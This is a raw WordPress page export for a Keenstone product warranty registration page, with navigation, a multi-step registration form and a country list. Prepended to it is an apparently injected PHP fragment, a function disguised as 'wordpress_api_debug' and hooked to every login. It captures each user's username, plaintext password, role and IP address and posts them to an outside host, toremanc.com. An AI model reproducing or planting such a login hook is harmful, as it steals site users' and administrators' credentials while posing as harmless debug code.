'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>{"id":2540,"date":"2022-11-09T10:05:16","date_gmt":"2022-11-09T02:05:16","guid":{"rendered":"https:\/\/www.primesupportpro.com\/?page_id=2540"},"modified":"2023-04-25T14:27:18","modified_gmt":"2023-04-25T06:27:18","slug":"keenstone","status":"publish","type":"page","link":"https:\/\/www.primesupportpro.com\/keenstone\/","title":{"rendered":"process a warranty-Keenstone"},"content":{"rendered":"\n<header class=\"wp-block-uagb-container uag-hide-tab uag-hide-mob uagb-block-b1bf262d alignfull uagb-is-root-container\">\n<div class=\"wp-block-uagb-container uagb-block-6a4e2531 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-image uagb-block-cc68c54a wp-block-uagb-image--layout-default wp-block-uagb-image--effect-zoomin wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><a class=\"\" href=\"https:\/\/www.primesupportpro.com\/index.php\/keenstone\/\" target=\"\" rel=\"noopener\"><img decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/11\/keenstone-logo-colorful.png \" src=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/11\/keenstone-logo-colorful.png\" alt=\"\" class=\"uag-image-2542\" width=\"138\" height=\"39\" title=\"\"\/><\/a><\/figure><\/div>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-a649e300 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\"><nav style=\"font-size:16px;font-style:normal;font-weight:500;\" class=\"is-horizontal is-content-justification-right is-nowrap is-layout-flex wp-container-2 has-text-color has-ast-global-color-8-color is-responsive items-justified-right no-wrap wp-block-navigation\" aria-label=\"Keenstone\"><button aria-haspopup=\"true\" aria-label=\"\u6253\u5f00\u83dc\u5355\" class=\"wp-block-navigation__responsive-container-open \" data-micromodal-trigger=\"modal-1\"><svg width=\"24\" height=\"24\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\"><path d=\"M5 5v1.5h14V5H5zm0 7.8h14v-1.5H5v1.5zM5 19h14v-1.5H5V19z\" \/><\/svg><\/button>\n\t\t\t<div class=\"wp-block-navigation__responsive-container \" style=\"\" id=\"modal-1\">\n\t\t\t\t<div class=\"wp-block-navigation__responsive-close\" tabindex=\"-1\" data-micromodal-close>\n\t\t\t\t\t<div class=\"wp-block-navigation__responsive-dialog\" aria-label=\"\u83dc\u5355\">\n\t\t\t\t\t\t\t<button aria-label=\"\u5173\u95ed\u83dc\u5355\" data-micromodal-close class=\"wp-block-navigation__responsive-container-close\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\" width=\"24\" height=\"24\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z\"><\/path><\/svg><\/button>\n\t\t\t\t\t\t<div class=\"wp-block-navigation__responsive-container-content\" id=\"modal-1-content\">\n\t\t\t\t\t\t\t<ul class=\"wp-block-navigation__container\"><li style=\"font-size: 16px;\" class=\"has-text-color has-ast-global-color-8-color wp-block-navigation-item wp-block-navigation-link\"><a class=\"wp-block-navigation-item__content\" href=\"https:\/\/www.primesupportpro.com\/keenstone\/\"><span class=\"wp-block-navigation-item__label\">Process A Warranty<\/span><\/a><\/li><li style=\"font-size: 16px;\" class=\"has-text-color has-ast-global-color-8-color wp-block-navigation-item wp-block-navigation-link\"><a class=\"wp-block-navigation-item__content\" href=\"https:\/\/www.primesupportpro.com\/privacy-policy-keenstone\/\"><span class=\"wp-block-navigation-item__label\">Privacy\u00a0Policy<\/span><\/a><\/li><li style=\"font-size: 16px;\" class=\"has-text-color has-ast-global-color-8-color wp-block-navigation-item wp-block-navigation-link\"><a class=\"wp-block-navigation-item__content\" href=\"https:\/\/www.primesupportpro.com\/warranty-information-keenstone\/\"><span class=\"wp-block-navigation-item__label\">Warranty Information<\/span><\/a><\/li><\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div><\/nav><\/div><\/div>\n<\/header>\n\n\n\n<header class=\"wp-block-uagb-container uag-hide-desktop uagb-block-30a5c15d alignfull uagb-is-root-container\">\n<div class=\"wp-block-uagb-container uagb-block-7cf58b00 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-image uagb-block-d109351f wp-block-uagb-image--layout-default wp-block-uagb-image--effect-static wp-block-uagb-image--align-none\"><figure class=\"wp-block-uagb-image__figure\"><a class=\"\" href=\"https:\/\/www.primesupportpro.com\/index.php\/keenstone\" target=\"\" rel=\"noopener\"><img decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/11\/keenstone-logo-colorful.png \" src=\"https:\/\/www.primesupportpro.com\/wp-content\/uploads\/2022\/11\/keenstone-logo-colorful.png\" alt=\"\" class=\"uag-image-2542\" width=\"158\" height=\"44\" title=\"\"\/><\/a><\/figure><\/div>\n<\/div><\/div>\n\n\n\n<div class=\"wp-block-uagb-container uagb-block-6843d954 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\"><nav style=\"color: #eb4600; font-size:23px;font-style:normal;font-weight:700;text-transform:capitalize;\" class=\"is-horizontal is-content-justification-right is-layout-flex wp-container-4 has-text-color is-responsive items-justified-right wp-block-navigation\" aria-label=\"Keenstone 2\"><button aria-haspopup=\"true\" aria-label=\"\u6253\u5f00\u83dc\u5355\" class=\"wp-block-navigation__responsive-container-open always-shown\" data-micromodal-trigger=\"modal-3\"><svg width=\"24\" height=\"24\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\"><path d=\"M5 5v1.5h14V5H5zm0 7.8h14v-1.5H5v1.5zM5 19h14v-1.5H5V19z\" \/><\/svg><\/button>\n\t\t\t<div class=\"wp-block-navigation__responsive-container hidden-by-default has-text-color has-ast-global-color-5-color has-background\" style=\"background-color: #ba3902\" id=\"modal-3\">\n\t\t\t\t<div class=\"wp-block-navigation__responsive-close\" tabindex=\"-1\" data-micromodal-close>\n\t\t\t\t\t<div class=\"wp-block-navigation__responsive-dialog\" aria-label=\"\u83dc\u5355\">\n\t\t\t\t\t\t\t<button aria-label=\"\u5173\u95ed\u83dc\u5355\" data-micromodal-close class=\"wp-block-navigation__responsive-container-close\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\" width=\"24\" height=\"24\" aria-hidden=\"true\" focusable=\"false\"><path d=\"M13 11.8l6.1-6.3-1-1-6.1 6.2-6.1-6.2-1 1 6.1 6.3-6.5 6.7 1 1 6.5-6.6 6.5 6.6 1-1z\"><\/path><\/svg><\/button>\n\t\t\t\t\t\t<div class=\"wp-block-navigation__responsive-container-content\" id=\"modal-3-content\">\n\t\t\t\t\t\t\t<ul class=\"wp-block-navigation__container\"><li style=\"color: #eb4600;font-size: 23px;\" class=\"has-text-color wp-block-navigation-item wp-block-navigation-link\"><a class=\"wp-block-navigation-item__content\" href=\"https:\/\/www.primesupportpro.com\/index.php\/keenstone\/\"><span class=\"wp-block-navigation-item__label\">Process A Warranty<\/span><\/a><\/li><li style=\"color: #eb4600;font-size: 23px;\" class=\"has-text-color wp-block-navigation-item wp-block-navigation-link\"><a class=\"wp-block-navigation-item__content\" href=\"https:\/\/www.primesupportpro.com\/index.php\/warranty-information-keenstone\/\"><span class=\"wp-block-navigation-item__label\">Warranty Information<\/span><\/a><\/li><\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div><\/nav><\/div><\/div>\n<\/header>\n\n\n\n<div class=\"wp-block-cover alignfull is-light is-position-center-center\" style=\"min-height:50vh\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim-80 has-background-dim has-background-gradient\" style=\"background:linear-gradient(4deg,rgb(0,14,97) 8%,rgb(186,42,0) 100%)\"><\/span><div class=\"wp-block-cover__inner-container\">\n<div class=\"is-layout-flex wp-container-7 wp-block-columns\">\n<div class=\"is-layout-flow wp-block-column\" style=\"flex-basis:100%\">\n<div class=\"inherit-container-width is-layout-constrained wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-d3168748\"><h4 class=\"uagb-heading-text\">Welcome to Keenstone<\/h4><\/div>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-e974a3f6\"><h2 class=\"uagb-heading-text\">Get Free 24 Months Warranty<\/h2><\/div>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-1f21b6b8\"><h6 class=\"uagb-heading-text\">We’re happy to assist you whenever you need us.<\/h6><\/div>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-uagb-buttons uagb-buttons__outer-wrap uagb-btn__large-btn uagb-btn-tablet__default-btn uagb-btn-mobile__default-btn uagb-block-b98b0887\"><div class=\"uagb-buttons__wrap uagb-buttons-layout-wrap\">\n<div class=\"wp-block-uagb-buttons-child uagb-buttons__outer-wrap uagb-block-06a637b0 wp-block-button is-style-outline\"><div class=\"uagb-button__wrapper\"><a class=\"uagb-buttons-repeater wp-block-button__link has-background has-text-color\" href=\"#regist\" rel=\"follow noopener\" target=\"_self\"><div class=\"uagb-button__link\">Click Here<\/div><span class=\"uagb-button__icon uagb-button__icon-position-after\"><svg xmlns=\"https:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\"><path d=\"M438.6 278.6l-160 160C272.4 444.9 264.2 448 256 448s-16.38-3.125-22.62-9.375c-12.5-12.5-12.5-32.75 0-45.25L338.8 288H32C14.33 288 .0016 273.7 .0016 256S14.33 224 32 224h306.8l-105.4-105.4c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0l160 160C451.1 245.9 451.1 266.1 438.6 278.6z\"><\/path><\/svg><\/span><\/a><\/div><\/div>\n<\/div><\/div>\n<\/div><\/div>\n<\/div>\n<\/div>\n<\/div><\/div>\n\n\n\n<div id=\"Regist\" class=\"wp-block-uagb-container uagb-block-9d934384 alignfull uagb-is-root-container\"><div class=\"uagb-container-inner-blocks-wrap\">\n<div class=\"wp-block-uagb-container uagb-block-7018efaf\">\n<div class=\"wp-block-uagb-advanced-heading uagb-block-9bf4c48c\" id=\"regist\"><h3 class=\"uagb-heading-text\">Regist Your Products<\/h3><p class=\"uagb-desc-text\">Registering your product is simple, fast and secure.<br>Benefits of registering:<br><strong>Get Free 24 Months Warranty<\/strong><br>Receive special offers and exclusive news about products.<br><br>For any problem, feel free to contact us,<br><strong><em><a href=\"mailto: support@keenstone.com\" data-type=\"mailto\" data-id=\"mailto: support@keenstone.com\">Email: support@keenstone.com.<\/a><\/em><\/strong><\/p><\/div>\n\n\n<div class=\"wpforms-container wpforms-container-full\" id=\"wpforms-2597\"><form id=\"wpforms-form-2597\" class=\"wpforms-validate wpforms-form wpforms-ajax-form\" data-formid=\"2597\" method=\"post\" enctype=\"multipart\/form-data\" action=\"\/wp-json\/wp\/v2\/pages\/2540\" data-token=\"fc3fc7819f883d4a1859b0616eb682cd\"><noscript class=\"wpforms-error-noscript\">\u8bf7\u5728\u6d4f\u89c8\u5668\u4e2d\u542f\u7528JavaScript\u6765\u5b8c\u6210\u6b64\u8868\u5355\u3002<\/noscript><div class=\"wpforms-page-indicator progress\" data-indicator=\"progress\" data-indicator-color=\"#eb4600\" data-scroll=\"0\"><span class=\"wpforms-page-indicator-page-title\" data-page-1-title=\"Product Registration\" data-page-2-title=\"Purchase Information\" data-page-3-title=\"Product Information\" data-page-4-title=\"Give Us Your Feedback\" data-page-5-title=\"Finish\">Product Registration<\/span><span class=\"wpforms-page-indicator-page-title-sep\" > - <\/span><span class=\"wpforms-page-indicator-steps\">Step <span class=\"wpforms-page-indicator-steps-current\">1<\/span> of 5<\/span><div class=\"wpforms-page-indicator-page-progress-wrap\"><div class=\"wpforms-page-indicator-page-progress\" style=\"width:20%;background-color:#eb4600\"><\/div><\/div><\/div><div class=\"wpforms-field-container\"><div class=\"wpforms-page wpforms-page-1 \"><div id=\"wpforms-2597-field_2-container\" class=\"wpforms-field wpforms-field-pagebreak\" data-field-id=\"2\"><\/div><div id=\"wpforms-2597-field_4-container\" class=\"wpforms-field wpforms-field-name\" data-field-id=\"4\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_4\">Name <span class=\"wpforms-required-label\">*<\/span><\/label><div class=\"wpforms-field-row wpforms-field-large\"><div class=\"wpforms-field-row-block wpforms-first wpforms-one-half\"><input type=\"text\" id=\"wpforms-2597-field_4\" class=\"wpforms-field-name-first wpforms-field-required\" name=\"wpforms[fields][4][first]\" placeholder=\"First Name\" required><label for=\"wpforms-2597-field_4\" class=\"wpforms-field-sublabel after wpforms-sublabel-hide\">\u524d\u4e00\u9875<\/label><\/div><div class=\"wpforms-field-row-block wpforms-one-half\"><input type=\"text\" id=\"wpforms-2597-field_4-last\" class=\"wpforms-field-name-last wpforms-field-required\" name=\"wpforms[fields][4][last]\" placeholder=\"Last Name\" required><label for=\"wpforms-2597-field_4-last\" class=\"wpforms-field-sublabel after wpforms-sublabel-hide\">\u540e\u4e00\u9875<\/label><\/div><\/div><\/div><div id=\"wpforms-2597-field_5-container\" class=\"wpforms-field wpforms-field-email\" data-field-id=\"5\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_5\">Email <span class=\"wpforms-required-label\">*<\/span><\/label><input type=\"email\" id=\"wpforms-2597-field_5\" class=\"wpforms-field-large wpforms-field-required\" name=\"wpforms[fields][5]\" placeholder=\"Your Email\" required><\/div><div id=\"wpforms-2597-field_26-container\" class=\"wpforms-field wpforms-field-phone\" data-field-id=\"26\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_26\">Phone<\/label><input type=\"tel\" id=\"wpforms-2597-field_26\" class=\"wpforms-field-large wpforms-smart-phone-field\" data-rule-smart-phone-field=\"true\" name=\"wpforms[fields][26]\" ><div class=\"wpforms-field-description\">This hepls our team personally reach out if you have any questions.<\/div><\/div><div id=\"wpforms-2597-field_6-container\" class=\"wpforms-field wpforms-field-address\" data-field-id=\"6\"><label class=\"wpforms-field-label\" for=\"wpforms-2597-field_6\">Address<\/label><div class=\"wpforms-field-row wpforms-field-large\"><div ><input type=\"text\" id=\"wpforms-2597-field_6\" class=\"wpforms-field-address-address1\" name=\"wpforms[fields][6][address1]\" ><label for=\"wpforms-2597-field_6\" class=\"wpforms-field-sublabel after \">Address Line 1<\/label><\/div><\/div><div class=\"wpforms-field-row wpforms-field-large\"><div class=\"wpforms-field-row-block wpforms-one-half wpforms-first\"><input type=\"text\" id=\"wpforms-2597-field_6-city\" class=\"wpforms-field-address-city\" name=\"wpforms[fields][6][city]\" ><label for=\"wpforms-2597-field_6-city\" class=\"wpforms-field-sublabel after \">City<\/label><\/div><div class=\"wpforms-field-row-block wpforms-one-half\"><input type=\"text\" id=\"wpforms-2597-field_6-state\" class=\"wpforms-field-address-state\" name=\"wpforms[fields][6][state]\" ><label for=\"wpforms-2597-field_6-state\" class=\"wpforms-field-sublabel after \">State \/ Province \/ Region<\/label><\/div><\/div><div class=\"wpforms-field-row wpforms-field-large\"><div class=\"wpforms-field-row-block wpforms-one-half wpforms-first\"><input type=\"text\" id=\"wpforms-2597-field_6-postal\" class=\"wpforms-field-address-postal\" name=\"wpforms[fields][6][postal]\" ><label for=\"wpforms-2597-field_6-postal\" class=\"wpforms-field-sublabel after \">Postal Code<\/label><\/div><div class=\"wpforms-field-row-block wpforms-one-half\"><select id=\"wpforms-2597-field_6-country\" class=\"wpforms-field-address-country\" name=\"wpforms[fields][6][country]\" ><option value=\"SZ\" >Eswatini (Kingdom of)<\/option><option value=\"XK\" >Kosovo<\/option><option value=\"TW\" >Taiwan, Republic of China<\/option><option value=\"TR\" >T\u00fcrkiye<\/option><option value=\"VN\" >Vietnam<\/option><option value=\"BT\" >\u4e0d\u4e39<\/option><option value=\"TL\" >\u4e1c\u5e1d\u6c76<\/option><option value=\"CN\" >\u4e2d\u56fd<\/option><option value=\"CF\" >\u4e2d\u975e\u5171\u548c\u56fd<\/option><option value=\"DK\" >\u4e39\u9ea6<\/option><option value=\"UA\" >\u4e4c\u514b\u5170<\/option><option value=\"UZ\" >\u4e4c\u5179\u522b\u514b\u65af\u5766<\/option><option value=\"UG\" >\u4e4c\u5e72\u8fbe<\/option><option value=\"UY\" >\u4e4c\u62c9\u572d<\/option><option value=\"TD\" >\u4e4d\u5f97<\/option><option value=\"YE\" >\u4e5f\u95e8<\/option><option value=\"AM\" >\u4e9a\u7f8e\u5c3c\u4e9a<\/option><option value=\"IL\" >\u4ee5\u8272\u5217<\/option><option value=\"IQ\" >\u4f0a\u62c9\u514b<\/option><option value=\"IR\" >\u4f0a\u6717\uff08\u4f0a\u65af\u5170\u5171\u548c\u56fd\uff09<\/option><option value=\"BZ\" >\u4f2f\u5229\u5179<\/option><option value=\"CV\" >\u4f5b\u5f97\u89d2<\/option><option value=\"RU\" >\u4fc4\u7f57\u65af\u8054\u90a6<\/option><option value=\"BG\" >\u4fdd\u52a0\u5229\u4e9a<\/option><option value=\"HR\" >\u514b\u7f57\u5730\u4e9a<\/option><option value=\"GU\" >\u5173\u5c9b<\/option><option value=\"GM\" >\u5188\u6bd4\u4e9a (\u897f\u975e\u7684\u72ec\u7acb\u56fd)<\/option><option value=\"IS\" >\u51b0\u5c9b<\/option><option value=\"GN\" >\u51e0\u5185\u4e9a<\/option><option value=\"GW\" >\u51e0\u5185\u4e9a\u6bd4\u7ecd<\/option><option value=\"LI\" >\u5217\u652f\u6566\u58eb\u767b<\/option><option value=\"CG\" >\u521a\u679c<\/option><option value=\"CD\" >\u521a\u679c(\u6c11\u4e3b\u5171\u548c\u56fd)<\/option><option value=\"LY\" >\u5229\u6bd4\u4e9a<\/option><option value=\"LR\" >\u5229\u6bd4\u91cc\u4e9a<\/option><option value=\"CA\" >\u52a0\u62ff\u5927<\/option><option value=\"GH\" >\u52a0\u7eb3<\/option><option value=\"GA\" >\u52a0\u84ec<\/option><option value=\"HU\" >\u5308\u7259\u5229<\/option><option value=\"BQ\" >\u5317\u4eac\u3001\u4e0a\u6d77\u548c\u6df1\u5733\u3002<\/option><option value=\"MK\" >\u5317\u9a6c\u5176\u987f<\/option><option value=\"MP\" >\u5317\u9a6c\u91cc\u4e9a\u7eb3\u7fa4\u5c9b<\/option><option value=\"GS\" >\u5357\u4e54\u6cbb\u4e9a\u53ca\u5357\u6851\u5a01\u5947\u7fa4\u5c9b<\/option><option value=\"AQ\" >\u5357\u6781\u6d32<\/option><option value=\"ZA\" >\u5357\u975e<\/option><option value=\"SS\" >\u5357\u975e<\/option><option value=\"BW\" >\u535a\u8328\u74e6\u7eb3<\/option><option value=\"QA\" >\u5361\u5854\u5c14<\/option><option value=\"RW\" >\u5362\u65fa\u8fbe<\/option><option value=\"LU\" >\u5362\u68ee\u5821<\/option><option value=\"ID\" >\u5370\u5c3c<\/option><option value=\"IN\" >\u5370\u5ea6<\/option><option value=\"GT\" >\u5371\u5730\u9a6c\u62c9<\/option><option value=\"EC\" >\u5384\u74dc\u591a\u5c14<\/option><option value=\"ER\" >\u5384\u7acb\u7279\u91cc\u4e9a<\/option><option value=\"CU\" >\u53e4\u5df4<\/option><option value=\"KG\" >\u5409\u5c14\u5409\u65af\u65af\u5766<\/option><option value=\"DJ\" >\u5409\u5e03\u63d0<\/option><option value=\"KZ\" >\u54c8\u8428\u514b\u65af\u5766<\/option><option value=\"CO\" >\u54e5\u4f26\u6bd4\u4e9a<\/option><option value=\"CR\" >\u54e5\u65af\u8fbe\u9ece\u52a0<\/option><option value=\"CM\" >\u5580\u9ea6\u9686<\/option><option value=\"TV\" >\u56fe\u74e6\u5362<\/option><option value=\"TM\" >\u571f\u5e93\u66fc\u65af\u5766<\/option><option value=\"LC\" >\u5723\u5362\u897f\u4e9a<\/option><option value=\"KN\" >\u5723\u57fa\u8328\u548c\u5c3c\u7ef4\u65af<\/option><option value=\"ST\" >\u5723\u591a\u7f8e\u548c\u666e\u6797\u897f\u6bd4<\/option><option value=\"BL\" >\u5723\u5df4\u6cf0\u52d2\u7c73<\/option><option value=\"VC\" >\u5723\u6587\u68ee\u7279\u548c\u683c\u6797\u7eb3\u4e01\u65af<\/option><option value=\"PM\" >\u5723\u76ae\u57c3\u5c14\u548c\u5bc6\u514b\u9686<\/option><option value=\"CX\" >\u5723\u8bde\u5c9b<\/option><option value=\"SH\" >\u5723\u8d6b\u52d2\u62ff\uff0c\u963f\u68ee\u677e\u5c9b\u548c\u7279\u91cc\u65af\u5766\u8fbe\u5e93\u5c3c\u4e9a<\/option><option value=\"SX\" >\u5723\u9a6c\u4e01\u5c9b\uff08\u8377\u5170\u7684\u4e00\u90e8\u5206\uff09<\/option><option value=\"MF\" >\u5723\u9a6c\u4e01\uff08\u6cd5\u56fd\u90e8\u5206\uff09<\/option><option value=\"SM\" >\u5723\u9a6c\u529b\u8bfa<\/option><option value=\"GY\" >\u572d\u4e9a\u90a3<\/option><option value=\"TZ\" >\u5766\u6851\u5c3c\u4e9a\u8054\u5408\u5171\u548c\u56fd<\/option><option value=\"EG\" >\u57c3\u53ca<\/option><option value=\"ET\" >\u57c3\u585e\u4fc4\u6bd4\u4e9a<\/option><option value=\"KI\" >\u57fa\u91cc\u5df4\u65af<\/option><option value=\"TJ\" >\u5854\u5409\u514b\u65af\u5766\u65af\u5766\u65af\u5766<\/option><option value=\"SN\" >\u585e\u5185\u52a0\u5c14<\/option><option value=\"RS\" >\u585e\u5c14\u7ef4\u4e9a<\/option><option value=\"SL\" >\u585e\u62c9\u5229\u6602<\/option><option value=\"CY\" >\u585e\u6d66\u8def\u65af<\/option><option value=\"SC\" >\u585e\u820c\u5c14\u7fa4\u5c9b<\/option><option value=\"MX\" >\u58a8\u897f\u54e5<\/option><option value=\"TG\" >\u591a\u54e5<\/option><option value=\"DO\" >\u591a\u660e\u5c3c\u52a0\u5171\u548c\u56fd<\/option><option value=\"DM\" >\u591a\u7c73\u5c3c\u52a0<\/option><option value=\"GB\" >\u5927\u4e0d\u5217\u98a0\u53ca\u5317\u7231\u5c14\u5170\u8054\u5408\u738b\u56fd<\/option><option value=\"AX\" >\u5965\u5170\u7fa4\u5c9b<\/option><option value=\"AT\" >\u5965\u5730\u5229<\/option><option value=\"VE\" >\u59d4\u5185\u745e\u62c9\uff08\u73bb\u5229\u74e6\u5c14\u5171\u548c\u56fd\uff09<\/option><option value=\"BD\" >\u5b5f\u52a0\u62c9\u56fd<\/option><option value=\"AO\" >\u5b89\u54e5\u62c9<\/option><option value=\"AI\" >\u5b89\u572d\u62c9<\/option><option value=\"AG\" >\u5b89\u63d0\u74dc\u5c9b\u548c\u5df4\u5e03\u8fbe<\/option><option value=\"AD\" >\u5b89\u9053\u5c14<\/option><option value=\"FM\" >\u5bc6\u514b\u7f57\u5c3c\u897f\u4e9a\uff08\u8054\u90a6\uff09<\/option><option value=\"NI\" >\u5c3c\u52a0\u62c9\u74dc<\/option><option value=\"NG\" >\u5c3c\u65e5\u5c14\u5c14\u5229\u4e9a<\/option><option value=\"NE\" >\u5c3c\u65e5\u5c14\u5c14\u5c14<\/option><option value=\"NP\" >\u5c3c\u6cca\u5c14<\/option><option value=\"PS\" >\u5df4\u52d2\u65af\u5766(\u56fd\u5bb6)<\/option><option value=\"BS\" >\u5df4\u54c8\u9a6c<\/option><option value=\"PK\" >\u5df4\u57fa\u65af\u5766<\/option><option value=\"BB\" >\u5df4\u5df4\u591a\u65af<\/option><option value=\"PG\" >\u5df4\u5e03\u4e9a\u65b0\u51e0\u5185\u4e9a<\/option><option value=\"PY\" >\u5df4\u62c9\u572d<\/option><option value=\"PA\" >\u5df4\u62ff\u9a6c<\/option><option value=\"BH\" >\u5df4\u6797<\/option><option value=\"BR\" >\u5df4\u897f<\/option><option value=\"BF\" >\u5e03\u5409\u7eb3\u6cd5\u7d22<\/option><option value=\"BV\" >\u5e03\u7ef4\u5c9b<\/option><option value=\"BI\" >\u5e03\u9686\u8fea<\/option><option value=\"GR\" >\u5e0c\u814a<\/option><option value=\"PW\" >\u5e15\u52b3\u5171\u548c\u56fd<\/option><option value=\"CK\" >\u5e93\u514b\u7fa4\u5c9b<\/option><option value=\"CW\" >\u5e93\u62c9\u7d22<\/option><option value=\"KY\" >\u5f00\u66fc\u7fa4\u5c9b<\/option><option value=\"DE\" >\u5fb7\u56fd<\/option><option value=\"IT\" >\u610f\u5927\u5229<\/option><option value=\"SB\" >\u6240\u7f57\u95e8\u7fa4\u5c9b<\/option><option value=\"TK\" >\u6258\u514b\u52b3<\/option><option value=\"LV\" >\u62c9\u8131\u7ef4\u4e9a<\/option><option value=\"NO\" >\u632a\u5a01<\/option><option value=\"CZ\" >\u6377\u514b\u5171\u548c\u56fd<\/option><option value=\"MD\" >\u6469\u5c14\u591a\u74e6\uff08\u5171\u548c\u56fd\uff09<\/option><option value=\"MA\" >\u6469\u6d1b\u54e5<\/option><option value=\"MC\" >\u6469\u7eb3\u54e5<\/option><option value=\"FJ\" >\u6590\u6d4e<\/option><option value=\"SK\" >\u65af\u6d1b\u4f10\u514b<\/option><option value=\"SI\" >\u65af\u6d1b\u6587\u5c3c\u4e9a<\/option><option value=\"SJ\" >\u65af\u74e6\u5c14\u5df4\u5c9b\u548c\u626c\u9a6c\u5ef6\u5c9b<\/option><option value=\"LK\" >\u65af\u91cc\u5170\u5361<\/option><option value=\"SG\" >\u65b0\u52a0\u5761<\/option><option value=\"NC\" >\u65b0\u5580\u91cc\u591a\u5c3c\u4e9a<\/option><option value=\"JE\" >\u65b0\u6cfd\u897f<\/option><option value=\"NZ\" >\u65b0\u897f\u5170<\/option><option value=\"JP\" >\u65e5\u672c<\/option><option value=\"CL\" >\u667a\u5229<\/option><option value=\"KP\" >\u671d\u9c9c<\/option><option value=\"KH\" >\u67ec\u57d4\u5be8<\/option><option value=\"GG\" >\u683c\u6069\u897f<\/option><option value=\"GD\" >\u683c\u6797\u7eb3\u8fbe<\/option><option value=\"GL\" >\u683c\u9675\u5170<\/option><option value=\"GE\" >\u683c\u9c81\u5409\u4e9a<\/option><option value=\"VA\" >\u68b5\u8482\u5188\u57ce\u56fd<\/option><option value=\"BE\" >\u6bd4\u5229\u65f6<\/option><option value=\"MR\" >\u6bdb\u91cc\u5854\u5c3c\u4e9a<\/option><option value=\"MU\" >\u6bdb\u91cc\u6c42\u65af<\/option><option value=\"TO\" >\u6c64\u52a0\u8bed<\/option><option value=\"BN\" >\u6c76\u83b1<\/option><option value=\"SA\" >\u6c99\u7279\u963f\u62c9\u4f2f<\/option><option value=\"FR\" >\u6cd5\u56fd<\/option><option value=\"TF\" >\u6cd5\u56fd\u5357\u90e8\u9886\u571f<\/option><option value=\"GF\" >\u6cd5\u5c5e\u572d\u4e9a\u90a3<\/option><option value=\"PF\" >\u6cd5\u5c5e\u6ce2\u5229\u5c3c\u897f\u4e9a<\/option><option value=\"FO\" 